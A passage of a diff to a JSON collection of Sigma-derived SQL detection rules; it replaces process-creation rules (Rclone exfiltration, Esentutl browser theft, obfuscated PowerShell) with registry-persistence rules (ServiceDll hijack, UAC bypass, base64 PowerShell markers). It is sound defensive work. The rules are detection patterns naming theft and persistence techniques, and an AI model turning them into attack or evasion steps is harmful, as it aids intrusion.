"fdbf0b9d-0182-4c43-893b-a1eaab92d085", "status": "experimental", - "description": "Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format", - "author": "frack113", + "description": "Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate applications registering a new custom protocol handler" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\jsc.exe' ESCAPE '\\' AND CommandLine LIKE '%.js%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE 'HKCR\\\\%' ESCAPE '\\' AND NewValue LIKE 'URL:%' ESCAPE '\\') AND NOT ((NewValue LIKE 'URL:ms-%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_jsc.yml" + "filename": "registry_set_persistence_custom_protocol_handler.yml" }, { - "title": "WScript or CScript Dropper", - "id": "cea72823-df4d-4567-950c-0b579eaf0846", - "status": "test", - "description": "Detects wscript/cscript executions of scripts located in user directories", - "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", + "title": "Add Debugger Entry To Hangs Key For Persistence", + "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "status": "experimental", + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.persistence" ], "falsepositives": [ - "Winzip", - "Other self-extractors" + "This value is not set by default but could be rarly used by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\winzip%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_script_dropper.yml" + "filename": "registry_set_hangs_debugger_persistence.yml" }, { - "title": "PUA - Rclone Execution", - "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", - "status": "experimental", - "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", - "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", + "title": "Suspicious Environment Variable Has Been Registered", + "id": "966315ef-c5e1-4767-ba25-fce9c8de3660", + "status": "test", + "description": "Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion", + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE '%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (NewValue IN ('powershell', 'pwsh') OR (NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR NewValue LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR NewValue LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR NewValue LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR NewValue LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR NewValue LIKE '%SW52b2tlL%' ESCAPE '\\' OR NewValue LIKE '%ludm9rZS%' ESCAPE '\\' OR NewValue LIKE '%JbnZva2Ut%' ESCAPE '\\' OR NewValue LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR NewValue LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR NewValue LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (NewValue LIKE 'SUVY%' ESCAPE '\\' OR NewValue LIKE 'SQBFAF%' ESCAPE '\\' OR NewValue LIKE 'SQBuAH%' ESCAPE '\\' OR NewValue LIKE 'cwBhA%' ESCAPE '\\' OR NewValue LIKE 'aWV4%' ESCAPE '\\' OR NewValue LIKE 'aQBlA%' ESCAPE '\\' OR NewValue LIKE 'R2V0%' ESCAPE '\\' OR NewValue LIKE 'dmFy%' ESCAPE '\\' OR NewValue LIKE 'dgBhA%' ESCAPE '\\' OR NewValue LIKE 'dXNpbm%' ESCAPE '\\' OR NewValue LIKE 'H4sIA%' ESCAPE '\\' OR NewValue LIKE 'Y21k%' ESCAPE '\\' OR NewValue LIKE 'cABhAH%' ESCAPE '\\' OR NewValue LIKE 'Qzpc%' ESCAPE '\\' OR NewValue LIKE 'Yzpc%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_rclone_execution.yml" + "filename": "registry_set_suspicious_env_variables.yml" }, { - "title": "Findstr Launching .lnk File", - "id": "33339be3-148b-4e16-af56-ad16ec6c7e7b", + "title": "DNS-over-HTTPS Enabled by Registry", + "id": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", "status": "test", - "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", - "author": "Trent Liffick", + "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\n", + "author": "Austin Songer", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1202", - "attack.t1027.003" + "attack.t1140", + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%.lnk' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Edge\\\\BuiltInDnsClientEnabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Google\\\\Chrome\\\\DnsOverHttpsMode' ESCAPE '\\' AND NewValue = 'secure') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Mozilla\\\\Firefox\\\\DNSOverHTTPS\\\\Enabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')))" ], - "filename": "proc_creation_win_findstr_lnk.yml" + "filename": "registry_set_dns_over_https_enabled.yml" }, { - "title": "Execution of Powershell Script in Public Folder", - "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "title": "Potential Persistence Via Outlook Home Page", + "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", "status": "experimental", - "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects potential persistence activity via outlook home pages.", + "author": "Tobias Michalski (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1112" + ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_public_folder.yml" + "filename": "registry_set_persistence_outlook_homepage.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher", - "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", + "title": "Outlook Security Settings Updated - Registry", + "id": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", "status": "test", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects changes to the registry values related to outlook security settings", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" + "filename": "registry_set_office_outlook_security_settings.yml" }, { - "title": "Uncommon One Time Only Scheduled Task At 00:00", - "id": "970823b7-273b-460a-8afc-3a6811998529", + "title": "ServiceDll Hijack", + "id": "612e47e9-8a59-43a6-b404-f48683f45bd6", "status": "experimental", - "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", - "author": "pH-T (Nextron Systems)", + "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry. This is often used as a method of persistence.", + "author": "frack113", + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ], "falsepositives": [ - "Software installation" + "Administrative scripts", + "Installation of a service" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Parameters\\\\ServiceDll' ESCAPE '\\') AND NOT ((NewValue LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\Parameters\\\\ServiceDll' ESCAPE '\\' AND NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_one_time_only_midnight_task.yml" + "filename": "registry_set_servicedll_hijack.yml" }, { - "title": "Esentutl Steals Browser Information", - "id": "6a69f62d-ce75-4b57-8dce-6351eb55b362", - "status": "experimental", - "description": "One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", - "author": "frack113", + "title": "UAC Bypass Using Windows Media Player - Registry", + "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName = 'esentutl.exe') AND (CommandLine LIKE '%/r%' ESCAPE '\\' OR CommandLine LIKE '%-r%' ESCAPE '\\') AND CommandLine LIKE '%\\\\Windows\\\\WebCache%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND NewValue = 'Binary Data')" ], - "filename": "proc_creation_win_esentutl_webcache.yml" + "filename": "registry_set_uac_bypass_wmp.yml" }, { - "title": "7Zip Compressing Dump Files", - "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", + "title": "Scheduled TaskCache Change by Uncommon Program", + "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", "status": "experimental", - "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", + "author": "Syed Hasan (@syedhasan009)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.t1053", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (NewProcessName = 'System')))" ], - "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" + "filename": "registry_set_taskcache_entry.yml" }, { - "title": "MMC20 Lateral Movement", - "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", - "status": "test", - "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", - "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", + "title": "Potential Persistence Via Scrobj.dll COM Hijacking", + "id": "fe20dda1-6f37-4379-bbe0-a98d400cae90", + "status": "experimental", + "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1021.003" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Unlikely" + "Legitimate use of the dll." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%InprocServer32\\\\(Default)' ESCAPE '\\' AND NewValue LIKE 'C:\\\\WINDOWS\\\\system32\\\\scrobj.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" + "filename": "registry_set_persistence_scrobj_dll.yml" }, { - "title": "Suspicious Svchost Process", - "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", - "status": "experimental", - "description": "Detects a suspicious svchost process start", - "author": "Florian Roth (Nextron Systems)", + "title": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", + "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", + "status": "test", + "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.persistence", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentProcessName = '') OR (ParentProcessName = '') OR (ParentProcessName = '-')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE '%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE '%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE 